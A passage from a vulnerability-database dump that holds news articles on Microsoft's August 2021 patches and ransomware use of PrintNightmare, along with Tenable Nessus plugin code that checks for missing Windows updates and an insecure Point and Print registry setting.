[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>) (CVSS score: 9.8) - Windows LSA Spoofing Vulnerability\n * [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36936>) (CVSS score: 8.8) - Windows Print Spooler Remote Code Execution Vulnerability\n\nWhile CVE-2021-36942 
contains fixes to secure systems against NTLM relay attacks like [PetitPotam](<https://thehackernews.com/2021/07/new-petitpotam-ntlm-relay-attack-lets.html>) by blocking the LSARPC interface, CVE-2021-36936 resolves yet another remote code execution flaw in the Windows Print Spooler component.\n\n\"An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate against another server using NTLM,\" Microsoft said in its advisory for CVE-2021-36942; adding the \"security update blocks the affected API calls OpenEncryptedFileRawA and OpenEncryptedFileRawW through LSARPC interface.\"\n\nCVE-2021-36936 is also one of three flaws in the Print Spooler service that Microsoft has fixed this month, with the two other vulnerabilities being [CVE-2021-36947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36947>) (CVSS score: 8.2) and [CVE-2021-34483](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>) (CVSS score: 7.8), the latter of which concerns an elevation of privilege vulnerability.\n\nIn addition, Microsoft has released [security updates](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) to resolve a previously disclosed remote code execution in the Print Spooler service tracked as [CVE-2021-34481](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) (CVSS score: 8.8). 
This changes the default behavior of the \"[Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>)\" feature, effectively preventing non-administrator users from installing or updating new and existing printer drivers using drivers from a remote computer or server without first elevating themselves to an administrator.\n\nAnother critical flaw remediated as part of Patch Tuesday updates is [CVE-2021-26424](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26424>) (CVSS score: 9.9), a remote code execution vulnerability in Windows TCP/IP, which Microsoft notes \"is remotely triggerable by a malicious Hyper-V guest sending an ipv6 ping to the Hyper-V host. An attacker could send a specially crafted TCP/IP packet to its host utilizing the TCP/IP Protocol Stack (tcpip.sys) to process packets.\"\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nBesides Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including -\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-08-01>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-August/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red 
Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T05:31:00", "type": "thn", "title": "Microsoft Releases Windows Updates to Patch Actively Exploited Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-36936", 
"CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2021-08-11T05:31:39", "id": "THN:F601EBBE359B3547B8E79F0217562FEF", "href": "https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[](<https://thehackernews.com/images/-YB6xMmNkBp0/YRYuIvxMidI/AAAAAAAADhg/a2Ee5QkoQZw6JlnYhCIdg3Nk-HM2yu2wwCLcBGAsYHQ/s0/ransomware.jpg>)\n\nRansomware operators such as Magniber and Vice Society are actively exploiting vulnerabilities in Windows Print Spooler to compromise victims and spread laterally across a victim's network to deploy file-encrypting payloads on targeted systems.\n\n\"Multiple, distinct threat actors view this vulnerability as attractive to use during their attacks and may indicate that this vulnerability will continue to see more widespread adoption and incorporation by various adversaries moving forward,\" Cisco Talos [said](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) in a report published Thursday, corroborating an [independent analysis](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) from CrowdStrike, which observed instances of Magniber ransomware infections targeting entities in South Korea.\n\nWhile Magniber ransomware was first spotted in late 2017 singling out victims in South Korea through malvertising campaigns, Vice Society is a new entrant that emerged on the ransomware landscape in mid-2021, primarily targeting public school districts and other educational institutions. 
The attacks are said to have taken place since at least July 13.\n\nSince June, a series of \"PrintNightmare\" issues affecting the Windows print spooler service has come to light that could enable remote code execution when the component performs privileged file operations -\n\n * [**CVE-2021-1675**](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on June 8)\n * [**CVE-2021-34527**](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on July 6-7)\n * [**CVE-2021-34481**](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)\n * [**CVE-2021-36936**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10) \n * [**CVE-2021-36947**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)\n * [**CVE-2021-34483**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Elevation of Privilege Vulnerability (Patched on August 10)\n * [**CVE-2021-36958**](<https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Unpatched)\n\nCrowdStrike noted it was able to successfully prevent attempts made by the Magniber ransomware gang at exploiting the PrintNightmare vulnerability.\n\nVice Society, on the other hand, leveraged a variety of techniques to conduct post-compromise discovery and reconnaissance prior to bypassing native Windows protections for credential theft and privilege 
escalation.\n\n[](<https://thehackernews.com/images/-JlsTWIHVgX4/YRYltMOGBKI/AAAAAAAADhQ/pzUFIcW6y0ABjOe3PuUQE5cPSnEOvGP9ACLcBGAsYHQ/s0/ransomware.jpg>)\n\nSpecifically, the attacker is believed to have used a malicious library associated with the PrintNightmare flaw (CVE-2021-34527) to pivot to multiple systems across the environment and extract credentials from the victim.\n\n\"Adversaries are constantly refining their approach to the ransomware attack lifecycle as they strive to operate more effectively, efficiently, and evasively,\" the researchers said. \"The use of the vulnerability known as PrintNightmare shows that adversaries are paying close attention and will quickly incorporate new tools that they find useful for various purposes during their attacks.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-13T08:29:00", "type": "thn", "title": "Ransomware Gangs Exploiting Windows Print Spooler Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34527", "CVE-2021-36936", "CVE-2021-36947", "CVE-2021-36958"], "modified": "2021-08-13T08:32:51", "id": "THN:6428957E9DED493169A2E63839F98667", "href": "https://thehackernews.com/2021/08/ransomware-gangs-exploiting-windows.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-12T03:43:11", "description": "The remote system may be in a vulnerable state to exploitation by having the HKLM\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\RestrictDriverInstallationToAdministrators registry key set to 0.", "cvss3": {}, "published": "2022-02-22T00:00:00", "type": "nessus", "title": "Windows Operating System Hardening Measure (RestrictDriverInstallationToAdministrators)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34481"], "modified": "2022-02-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "WINDOWS_RESTRICTDRIVERINSTALLATIONTOADMINISTRATORS_REG_CHECK.NASL", "href": "https://www.tenable.com/plugins/nessus/158243", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158243);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/22\");\n\n script_name(english:\"Windows Operating System Hardening Measure (RestrictDriverInstallationToAdministrators)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is missing an operating system hardening measure.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote system may be in a vulnerable state to exploitation by having the \nHKLM\\Software\\Policies\\Microsoft\\Windows 
NT\\Printers\\PointAndPrint\\RestrictDriverInstallationToAdministrators registry\nkey set to 0.\");\n # https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a4e8dad8\");\n # https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9896731b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the DWORD registry value RestrictDriverInstallationToAdministrators under: HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint to 1\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) \n audit(AUDIT_SHARE_FAIL, share);\n\nhotfix_check_fversion_init();\nregistry_init();\nvar hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\nvar key = '\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Printers\\\\PointAndPrint\\\\RestrictDriverInstallationToAdministrators';\nvar value = get_registry_value(handle:hklm, item:key);\nRegCloseKey(handle:hklm);\n\nif (!isnull(value) && value == 0)\n{\n\n var report = '\\n Nessus detected the following insecure registry key configuration:\\n';\n report += ' - ' + key + ' is present in the registry with value ' + value + '\\n';\n\n hotfix_add_report(report);\n\n hotfix_security_note();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005095 or cumulative update 5005090. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-34533, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-36927)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005095: Windows Server 2008 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005095.NASL", "href": "https://www.tenable.com/plugins/nessus/152425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152425);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-36927\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005095\");\n script_xref(name:\"MSKB\", value:\"5005090\");\n script_xref(name:\"MSFT\", value:\"MS21-5005095\");\n script_xref(name:\"MSFT\", value:\"MS21-5005090\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005095: Windows Server 2008 Security Update (August 2021)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005095\nor cumulative update 5005090. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-34533, CVE-2021-36936, CVE-2021-36937,\n CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484,\n CVE-2021-36927)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005095-security-only-update-a324fdbb-ce90-4c4d-8d9d-e9f2f2a57e0e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de72daa6\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005090-monthly-rollup-8feea9cd-25f9-41ef-b8e1-815211dc4e6c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?910509c6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005095 or Cumulative Update KB5005090.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005095',\n '5005090'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005095, 5005090])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n 
An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005030.NASL", "href": "https://www.tenable.com/plugins/nessus/152435", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and 
package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152435);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005030\");\n script_xref(name:\"MSFT\", value:\"MS21-5005030\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005030-os-build-17763-2114-cec503ed-cc09-4641-bdc1-988153e0bd9a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34b43ea5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005030'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:17763,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005030])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": 
"NONE"}}, {"lastseen": "2023-05-18T15:01:53", "description": "The remote Windows host is missing security update 4561645 or cumulative update 4561670. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft 